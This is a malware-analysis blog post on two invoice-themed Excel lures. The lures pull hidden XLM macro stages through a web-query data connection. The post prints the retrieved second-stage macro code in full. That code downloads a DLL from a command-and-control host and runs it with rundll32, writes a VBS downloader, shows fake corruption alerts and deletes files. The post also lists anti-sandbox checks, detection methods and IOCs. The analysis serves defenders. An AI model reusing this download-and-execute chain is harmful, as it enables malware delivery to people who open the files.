Getting Sneakier: Hidden Sheets, Data Connections, and XLM Macros

March 18, 2020

Introduction

In January of 2019, we published a blog titled “Extracting ‘Sneaky’ Excel XLM Macros” that detailed a technique attackers had adopted for embedding malicious logic under a less understood facet of Excel Spreadsheets, Excel 4.0 macros aka XLM macros.

Over the past few weeks, we have observed a surge in maldocs leveraging XLM macros. A trend that other researchers have noticed and provided analysis on. Examples include “A Safe Excel Sheet Not So Safe” written by Xavier Mertens, as well as “Excel 4.0 Macro MalSpam Campaigns” written by Diana Lopera.

In this post, we provide a detailed analysis of an interesting campaign that is tied to a variety of executable payloads, a subject matter we’ll be covering in a future blog. As of the time of writing, detection rates for this class of attack are relatively low, and these samples happily bypass the internal GSuite and O365 protection mechanisms.

We’ll dive into the analysis of two separate documents. The first one was attached to an email that was sent to us directly by the threat actor in late February (offline). The second was captured on March 17th, and in this case, the C2 servers are currently active.

Document One: inv-27101.xls

sha256: a83890bbc081b9ec839c9a32ec06eae6f549a0f85fe0a30751ef229a58e440af | InQuest Labs – InQuest.net | VirusTotal

Invoice85005.xls details on VirusTotal — Document Two: Invoice85005.xls

sha256: bc39d3bb128f329d95393bf0a4f6ec813356e847a00794c18258bfa48df6937f | InQuest Labs – InQuest.net | VirusTotal

Depicted below is a graphic extracted from this malicious document lure. This is a common tactic employed by attackers today. To embed coercive text within an image in an attempt to bypass string-based detection engines while social engineering the target into activating the embedded logic. This document has one Excel sheet and one hidden macrosheet:

The macrosheet can be easily unhidden through the Microsoft Excel UI/UX, as seen here in this animation:

Once the target user enables the active content, an Auto_Open sequence is activated that pivots to the cell D49, the contents of which are shown here:

This embedded macro first checks a few conditions before executing its primary directive, exiting early if any of the following conditions are not met:

The cell containing GET.WORKSPACE(19) ensures a mouse is present.
The cell containing GET.WORKSPACE(42) ensures that the system is capable of playing sounds.
The cell containing GET.WORKSPACE(1) ensures that the environment is Windows.

These routines are anti-sandbox tactics. The actor wants to ensure that the sample is not being detonated by a behavioral analysis tool. To learn more about the GET.WORKSPACE() function, see Excel 4.0 Macro Functions Reference.

Assuming the conditions are met, the primary directive stored within the cell labeled ‘asdf’ is executed. Let’s take a look at the cell ‘asdf’, depicted below:

This logic checks for content in the cell U113 of the first sheet every 2 seconds, in search of the string ‘LOS’. The loop is continued while there is a matching; otherwise, execution continues within the I66 cell, which is pointed by ‘sfgdfsh‘ label. The code on line I66 to I69, basically copies the cells U110-U113 in Sheet1 to I70-I73 cell in the macrosheet.

If you check the content of U110 to U113 cells on the Sheet1, without enabling the active content, you see that these cells are empty. This is the most interesting aspect of this campaign as, so far as we know, a novel technique. A “web query” object is utilized by the maldoc to pull cell content from a remote URL. The web query sends the request to this remote server upon document activation and keeps sending requests every few seconds after. One can see the reference URL (hxxps://pnxkntdl[.]xyz/KJSDBViad7) in clear text by simply opening the document in a hex viewer for example:

To further analyze how the URL is triggered, we’ll use BiffView to parse the Excel document. If you search for the byte sequence ‘68 74 74 70′ (“HTTP”) you’ll find that the URL lives within a BIFF DCONN object. This object triggers the web query, see the relevant flags highlighted in the depiction below that aligns the BIFF record with the relevant documentation:

The data returned from the remote URL is an XHTML (XML) document.

And the web query content is enclosed within the ‘<PRE>’ element of that

The web query requests and responses are sent over an encrypted channel (HTTPS). To pierce into the communications between Excel and the remote site, we use mitmproxy. By default, mitmproxy listens on 127.0.0.1:8080. We change the proxy setting of the system to redirect all traffic through 127.0.0.1:8080:

The following content was returned from the remote URL, when the web query was executed in our lab:

<html>

<head><base href="/lander/excel4_1581586732/index.html">

<link rel="stylesheet" href="resource://content-accessible/plaintext.css">

</head>

<body>

<pre>

=CLOSE(FALSE)

=CLOSE(FALSE)

=CLOSE(FALSE)

=CLOSE(FALSE)"</pre>

</body>

</html>

The content of <pre> element is copied to the cells U110 through U113. Because the resulting content of U110 will contain the substring ‘LOS’, the macro will loop and checks again within two seconds. This retrieved payload is completely benign. So what’s going on here? This is good operational security on behalf of the actor. The remote server has not deemed us worthy of receiving the next stage of this malware. Perhaps the restriction is regional, maybe something else, luckily…. we got another document.

Analysis of Document Two: Invoice85005.xls

Similar to the previous sample, this one contains an Excel sheet and “very” hidden macrosheet. Very hidden macro sheets can not be revealed via a simple UI/UX toggle. They must be hex edited to be visible within the native Excel application. See our previous blog for more information. Again, a graphical lure with coercive text is used to entice the user into activating the embedded logic:

To unhide the macrosheet, we use Hexinator to change the type of the macrosheet manually. We know from previous research that a hidden and a very hidden sheet starts with “85 00 ?? ?? ?? ?? ?? ?? 01 01″ and “85 00 ?? ?? ?? ?? ?? ?? 02 01″ patterns respectively. To unhide these sheets, we just need to set the ninth byte to zero, as shown here in an animation:

Updating byte 9 in hex editor to unhide the sheets

Again, the macro checks a few conditions:

=IF(GET.WORKSPACE(42),,CLOSE(TRUE))

=GET.WORKSPACE(13)

=GET.WORKSPACE(14)

=IF(H24<770, CLOSE(FALSE),)

=IF(H25<381, CLOSE(FALSE),)

=IF(GET.WORKSPACE(19),,CLOSE(TRUE))

=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ON.TIME(NOW()+"00:00:02", "agawf23f"),CLOSE(TRUE))

=RETURN()

it also checks whether the macrosheet is hidden

=WORKBOOK.HIDE("0TQ1ByZPP5", TRUE)

We can easily patch this condition by changing TRUE to FALSE.

It then jumps to U33 (agawf23f label):

=IF(ISNUMBER(SEARCH("s",Sheet1!S70)), GOTO(P54), ON.TIME(NOW()+"00:00:02", "rstegerg3"))

=RETURN()

=IF(ISNUMBER(SEARCH("s",Sheet1!S70)), GOTO(P54), ON.TIME(NOW()+"00:00:02", "agawf23f"))

=RETURN()

This file also contains a web query object. The remote URL is seen below (hxxps://tdvomds[.]pw/12341324rfefv):

The web query will populate a few cells in Sheet1 if it can successfully connect to the remote URL. The above macrosheet copies these cells from Sheet1 to the macrosheet and then executes the lines.

Again, we use mitmproxy to capture the webquery response. Another approach is to modify the macro to prevent the execution of the second-level macro before enabling the macro. However, we are also interested in capturing the HTTP response.

The HTTP response contains an XHTML document, and this time, we are worthy of receiving the next-stage payload:

<html>

<head><base href="/lander/df3f1f14f134f314f/index.html">

<link rel="stylesheet" href="resource://content-accessible/plaintext.css">

</head>

<body>

<pre>

="https://tdvomds.pw/fef23f23f"<br>

=GET.WORKSPACE(26)<br>

="C:\Users\"&R[-1]C&"\AppData\Local\Temp\CVR"&RANDBETWEEN(1000,9999)&".tmp.cvr"<br>

="C:\Users\"&R[-2]C&"\AppData\Local\Temp\"&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&RANDBETWEEN(100,999)&".vbs"<br>

="C:\Users\"&R[-3]C&"\AppData\Local\Temp\"&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&RANDBETWEEN(1000,9999)&".vbs"<br>

=IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))), GOTO(R[2]C),)<br>

=IF(ISNUMBER(SEARCH("64",GET.WORKSPACE(1))), GOTO(R[7]C),)<br>

=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-7]C,R[-5]C,0,0)<br>

=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.",2)<br>

=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe",""&R[-7]C&",DllRegisterServer",0,5)<br>

=CLOSE(FALSE)<br>

=LEFT(CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122)), RANDBETWEEN(4, 8))<br>

=LEFT(CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122)), RANDBETWEEN(4, 8))<br>

=FOPEN(R[-10]C,3)<br>

=FWRITELN(R[-1]C,"Dim "&R[-3]C&", "&R[-2]C&"")<br>

=FWRITELN(R[-2]C,"Set "&R[-4]C&" = CreateObject(""MSXML2.ServerXMLHTTP.6.0"")")<br>

=FWRITELN(R[-3]C,""&R[-5]C&".setOption(2) = 13056")<br>

=FWRITELN(R[-4]C,""&R[-6]C&".Open ""GET"", """&R[-17]C&""", False")<br>

=FWRITELN(R[-5]C,""&R[-7]C&".setRequestHeader ""User-Agent"", ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)""")<br>

=FWRITELN(R[-6]C,""&R[-8]C&".Send")<br>

=FWRITELN(R[-7]C,"If "&R[-9]C&".Status = 200 Then")<br>

=FWRITELN(R[-8]C,"Set "&R[-9]C&" = CreateObject(""ADODB.Stream"")")<br>

=FWRITELN(R[-9]C,""&R[-10]C&".Open")<br>

=FWRITELN(R[-10]C,""&R[-11]C&".Type = 1")<br>

=FWRITELN(R[-11]C,""&R[-12]C&".Write "&R[-13]C&".ResponseBody")<br>

=FWRITELN(R[-12]C,""&R[-13]C&".SaveToFile """&R[-23]C&""", 2")<br>

=FWRITELN(R[-13]C,""&R[-14]C&".Close")<br>

=FWRITELN(R[-14]C,"End If")<br>

=FCLOSE(R[-15]C)<br>

=EXEC("explorer.exe "&R[-26]C&"")<br>

=WAIT(NOW()+"00:00:05")<br>

=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.",2)<br>

=FOPEN(R[-28]C,3)<br>

=FWRITELN(R[-1]C,"Set obj = GetObject(""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"")")<br>

=FWRITELN(R[-2]C,"obj.Document.Application.ShellExecute ""rundll32.exe"","" "&R[-32]C&",DllRegisterServer"",""C:\Windows\System32"",Null,0")<br>

=FCLOSE(R[-3]C)<br>

=EXEC("explorer.exe "&R[-32]C&"")<br>

=FILE.DELETE(R[-34]C)<br>

=CLOSE(FALSE)<br>

=RETURN()<br>

</pre>

</body>

</html>
The content of "<pre>" element from the XHTML document is written to the sheet and executed as the next-stage:

In this particular case, the pivot macro downloads a DLL file from hxxps://tdvomds[.]pw/fef23f23f (acc5fe0088037ddc055f9286380c56583effa1186afe9d08caea3e197b2643fd (warning, actual sample) and executes rundll32 to call its DllRegisterServer function to register/execute it. The logic within the DLL communicates with the following C&C servers:

hxxps://aquolepp[.]pw/milagrecf.php
hxxps://dhteijwrb[.]host/milagrecf.php

Detection and Mitigation

Optical Character Recognition (OCR)

A solid generic approach to detect this and many similar malicious document lures is to carve out the embedded image and then extract the semantic content via OCR. Within the XLS/BIFFv8 format, records have a maximum size of 8,228 bytes. If the size of data is greater than what can fit in a single record, then the data must be split into chunks. The first chunk is put in the first record, and the rest of the data chunks are placed in subsequent CONTINUE (3Ch) records. To successfully extract images from XLM files, one needs to strip these CONTINUE headers from the extracted image. To accomplish this task automatically, we’ve extended the oledump BIFF plugin (plugin_biff.py) to include a new command line switch for extracting images. You can find our patch in our Github repository (lines 570 to 603):

https://github.com/InQuest/DidierStevensSuite/blob/BIFF-Image-Dump-Switch/plugin_biff.py#L570-L592

Suspicious Attributes

Didier Steven’s oledump is a de facto tool in the arsenal of a maldoc analyst. We can leverage the BIFF plugin modified above to extract images, to filter for the DCONN record leveraged by both of the documents to retrieve a next-stage pivot:

$ oledump.py -p plugin_biff sample00/inv-27101.xls --pluginoptions "-o 876" 1: 4096 '\x05DocumentSummaryInformation' 2: 240 '\x05SummaryInformation' 3: 101088 'Workbook' Plugin: BIFF plugin 0876 135 DCONN : Data Connection

Additionally specifying the option to dump contents as a string, one can expose the embedded URL as well:

$ oledump.py -p plugin_biff sample00/inv-27101.xls --pluginoptions "-o 876 -s" 1: 4096 '\x05DocumentSummaryInformation' 2: 240 '\x05SummaryInformation' 3: 101088 'Workbook' Plugin: BIFF plugin 0876 135 DCONN : Data Connection ASCII: Connection hxxps://pnxkntdl[.]xyz/KJSDBViad7 Sheet1!DSKVJBdsj2

We’ve written and open-sourced a generic YARA hunting rule that looks for Microsoft Excel documents that contain a DCONN record and a URL:

Microsoft Excel Data Connection

To increase the detection accuracy, we can combine the above YARA rule with the following one to check the existence of hidden and “very” hidden macro sheets:

Microsoft Excel Hidden Macro Sheet

The samples above are all available for research and download via our open data portal https://labs.inquest.net.

IOCs

a83890bbc081b9ec839c9a32ec06eae6f549a0f85fe0a30751ef229a58e440af
acc5fe0088037ddc055f9286380c56583effa1186afe9d08caea3e197b2643fd
bc39d3bb128f329d95393bf0a4f6ec813356e847a00794c18258bfa48df6937f
hxxps://aquolepp[.]pw/milagrecf.php
hxxps://dhteijwrb[.]host/milagrecf.php
hxxps://pnxkntdl[.]xyz/KJSDBViad7
hxxps://tdvomds[.]pw/12341324rfefv
hxxps://tdvomds[.]pw/fef23f23f
aquolepp[.]pw
dhteijwrb[.]hos
pnxkntdl[.]xyz
tdvomds[.]pw

Free Email Hygiene Analysis

Solid email security begins with proper email hygiene. There are a variety of email hygiene technologies and wrapping one’s head around them all is challenging. Try our complimentary Email Hygiene Analysis and receive an instant report about your company’s security posture including a simple rating with iterative guidance, as well as a comparison against the Fortune 500. Try it today!

Deep File Inspection®malware analysis open source threat hunting YARA

About the Authors

Amirreza Niakanlahiji

More about this author

Pedram Amini

CTO

Currently serving as CTO under InQuest.net, Pedram was formerly a director at Avast, after the acquisition of his startup Jumpshot. Previously, he founded the Zero Day Initiative at TippingPoint, where he built and managed the world's largest group of independent researchers. He's had a long-time passion for reverse engineering, developing automation tools and processes. Pedram holds a CS degree from Tulane University and is an author of the book "Fuzzing: Brute Force Vulnerability Discovery".

More about this author

Back to Blog

Getting Sneakier: Hidden Sheets, Data Connections, and XLM Macros

Introduction

Analysis of Document Two: Invoice85005.xls

Detection and Mitigation

Optical Character Recognition (OCR)

Suspicious Attributes

IOCs

Free Email Hygiene Analysis

About the Authors

Amirreza Niakanlahiji

Pedram Amini

CTO

Products

Research & tools

Why Inquest

Resources

Company